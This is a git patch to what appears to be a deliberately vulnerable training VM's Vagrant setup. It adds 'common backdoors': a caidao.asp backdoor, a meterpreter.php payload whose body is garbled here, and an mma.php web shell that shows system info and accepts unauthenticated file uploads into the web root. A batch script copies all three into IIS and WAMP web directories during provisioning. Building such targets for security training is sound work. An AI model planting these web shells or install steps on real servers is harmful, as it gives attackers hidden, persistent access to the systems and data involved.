From 5711ad8e29274cdf3a568dc35e5ad2bbe3f2298b Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Tue, 25 Oct 2016 14:48:21 -0500 Subject: [PATCH] Add common backdoors --- Vagrantfile | 8 ++++---- resources/{caidao => backdoors}/caidao.asp | 0 resources/backdoors/meterpreter.php | 1 + resources/backdoors/mma.php | 9 +++++++++ scripts/installs/install_backdoors.bat | 3 +++ scripts/installs/setup_caidao.bat | 1 - 6 files changed, 17 insertions(+), 5 deletions(-) rename resources/{caidao => backdoors}/caidao.asp (100%) create mode 100644 resources/backdoors/meterpreter.php create mode 100644 resources/backdoors/mma.php create mode 100644 scripts/installs/install_backdoors.bat delete mode 100644 scripts/installs/setup_caidao.bat diff --git a/Vagrantfile b/Vagrantfile index 3cc95eb..bcd9c69 100644 --- a/Vagrantfile +++ b/Vagrantfile @@ -33,10 +33,6 @@ Vagrant.configure("2") do |config| config.vm.provision :shell, path: "scripts/installs/setup_ftp_site.bat" config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 - # Vulnerability - Chinese caidao.asp backdoor - config.vm.provision :shell, path: "scripts/installs/setup_caidao.bat" - config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 - # Vulnerability - Setup for Apache Struts config.vm.provision :shell, path: "scripts/chocolatey_installs/java.bat" config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 @@ -100,6 +96,10 @@ Vagrant.configure("2") do |config| config.vm.provision :shell, path: "scripts/installs/setup_axis2.bat" config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 + # Vulnerability - Chinese caidao.asp backdoor + config.vm.provision :shell, path: "scripts/installs/install_backdoors.bat" + config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 + # Configure Firewall to open up vulnerable services config.vm.provision :shell, path: "scripts/configs/configure_firewall.bat" config.vm.provision :shell, inline: "rm C:\\tmp\\vagrant-shell.bat" # Hack for this bug: https://github.com/mitchellh/vagrant/issues/7614 diff --git a/resources/caidao/caidao.asp b/resources/backdoors/caidao.asp similarity index 100% rename from resources/caidao/caidao.asp rename to resources/backdoors/caidao.asp diff --git a/resources/backdoors/meterpreter.php b/resources/backdoors/meterpreter.php new file mode 100644 index 0000000..20c75ce --- /dev/null +++ b/resources/backdoors/meterpreter.php @@ -0,0 +1 @@ +/*

'.php_uname().'
'; +echo '
'; +echo '
'; +if( $_POST['_upl'] == "Upload" ) { +if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'uplod d0n3 in SAME file // Th3 MMA \\

'; } +else { echo 'Upload GAGAL !!!

'; +} } +?> diff --git a/scripts/installs/install_backdoors.bat b/scripts/installs/install_backdoors.bat new file mode 100644 index 0000000..1d35754 --- /dev/null +++ b/scripts/installs/install_backdoors.bat @@ -0,0 +1,3 @@ +copy C:\vagrant\resources\backdoors\caidao.asp "C:\inetpub\wwwroot" +copy C:\vagrant\resources\backdoors\mma.php "C:\wamp\www" +copy C:\vagrant\resources\backdoors\meterpreter.php "C:\wamp\www" diff --git a/scripts/installs/setup_caidao.bat b/scripts/installs/setup_caidao.bat deleted file mode 100644 index daa3fb8..0000000 --- a/scripts/installs/setup_caidao.bat +++ /dev/null @@ -1 +0,0 @@ -copy C:\vagrant\resources\caidao\caidao.asp "C:\inetpub\wwwroot" \ No newline at end of file